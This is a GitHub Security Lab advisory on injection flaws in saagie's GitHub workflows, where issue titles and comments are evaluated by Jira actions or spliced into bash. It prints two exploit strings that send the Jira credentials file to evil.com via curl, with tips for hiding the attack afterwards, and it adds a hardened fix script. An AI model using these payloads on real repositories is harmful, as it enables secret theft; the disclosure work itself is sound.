Coordinated Disclosure Timeline
- 10/29/2020: Report sent to vendor
- 11/04/2020: Vendor acknowledges
- 12/01/2020: Issue resolved in all affected repositories
Summary
GitHub workflows in saagie/technologies, saagie/technologies-plugin and saagie/sdk repositories are vulnerable to arbitrary code execution from user comments.
Product
saagie/technologies, saagie/technologies-plugin and saagie/sdk repositories
Tested Version
Master branch.
Details
Issue 1: Hidden expression expansion of input parameters passed to atlassian/gajira-create or atlassian/gajira-comment
The Jira Add comment on issue step in comment_issue.yaml and the Jira Create issue step in each of the create_issue.yaml workflows are vulnerable to arbitrary code execution.
${{ github.event.issue.title }}, ${{ github.event.issue.body }} and ${{ github.event.comment.body }} are used to format input values passed to the atlassian/gajira-create and atlassian/gajira-comment actions. For example:
on:
  issue_comment:
    types: [created]
...
      uses: atlassian/gajira-comment@v2.0.0
      with:
        issue: ${{ steps.extract_jira_number.outputs.jira_number }}
        comment: |
          From : ${{ github.event.comment.user.login }}
          Comment :
          {quote}${{ github.event.comment.body }}{quote}
However, the Atlassian actions have a hidden feature: they expand {{ }} internally. So when the issue title, issue body or comment body contains an expression in double curly braces, that expression is evaluated by Node.js inside these actions.
Impact
This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may comment on an issue with:
{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}
which will exfiltrate the secret Jira API token to the attacker-controlled server. To make the attack less visible an attacker may then edit the comment to "Never mind, my bad".
Issue 2: The public GitHub issue title is used to format a shell command
When a user comments on a public issue it automatically starts the comment_issue.yaml GitHub workflow. The title of the issue is used to format a bash script.
on:
  issue_comment:
    types: [created]
...
      - name: Extract JIRA number
        id: extract_jira_number
        run: echo "::set-output name=jira_number::$(echo ${{ github.event.issue.title }}| sed 's/.*\[\(${{ secrets.JIRA_PROJECT }}-[[:digit:]]\{1,\}\)\].*/\1/')"
Impact
This vulnerability allows for arbitrary command injection into the bash script. For example a user may create an issue with the title:
a)"; curl -d @$HOME/.jira.d/credentials http://evil.com #
which will exfiltrate the secret Jira API token to the attacker-controlled server. To make the attack less visible the attacker may then modify the issue title and close the issue.
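The following is an added example, not code from the advisory or from the saagie repositories, showing the usual fix for Issue 2: the issue title is handed to the step through an environment variable rather than expanded with ${{ }} inside the run: script, so bash never parses its content. The variable names ISSUE_TITLE and JIRA_PROJECT, the sample titles and the project key PROJ are constructed for this example.

```shell
#!/usr/bin/env bash
# Added example (not the project's own workflow): hardened form of the
# "Extract JIRA number" step. In the workflow the untrusted value is mapped
# to an environment variable instead of being interpolated into `run:`:
#   - name: Extract JIRA number
#     id: extract_jira_number
#     env:
#       ISSUE_TITLE: ${{ github.event.issue.title }}
#       JIRA_PROJECT: ${{ secrets.JIRA_PROJECT }}
#     run: echo "::set-output name=jira_number::$(extract_jira_number)"
set -u

# Prints the "<PROJECT>-<digits>" key found in [brackets] in ISSUE_TITLE, or
# nothing when the title has no such key (the original step echoed the whole
# title back in that case, which leaked the raw title into the step output).
# JIRA_PROJECT is operator-controlled; it is assumed to contain only
# letters/digits, since it is spliced into a sed pattern.
extract_jira_number() {
  # Quoted expansion: the title is data, not code, whatever it contains.
  printf '%s\n' "$ISSUE_TITLE" |
    sed -n "s/.*\[\(${JIRA_PROJECT}-[[:digit:]]\{1,\}\)\].*/\1/p"
}

# Constructed sample inputs for a stand-alone run.
JIRA_PROJECT="PROJ"
ISSUE_TITLE="[PROJ-123] Pipeline fails on start"
extract_jira_number            # prints PROJ-123

# The injection string from the advisory is now just an unmatched title:
# no command is executed and nothing is printed.
ISSUE_TITLE='a)"; curl -d @$HOME/.jira.d/credentials http://evil.com #'
extract_jira_number
```

This addresses only the shell injection of Issue 2; for Issue 1 the untrusted title, body or comment text must not reach an input that the Atlassian actions template-expand, or the double curly braces must be stripped from it before it is passed on.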
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-206 in any communication regarding this issue.